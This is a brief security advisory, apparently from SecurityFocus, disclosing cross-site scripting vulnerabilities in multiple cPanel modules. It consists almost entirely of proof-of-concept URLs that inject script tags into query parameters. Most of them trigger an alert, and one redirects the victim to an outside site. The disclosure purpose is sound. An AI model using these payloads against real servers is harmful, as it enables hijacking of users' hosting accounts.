cPanel Multiple Module Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept examples have been provided:
http://www.example.com/frontend/x/cpanelpro/ignorelist.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/sql/repairdb.html?db=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/ftp/doaddftp.html?login="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/editmsg.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/testfile.html?email=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/err/erredit.html?dir=public_html/&file=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.cirt.net/'</script>
http://www.example.com/frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus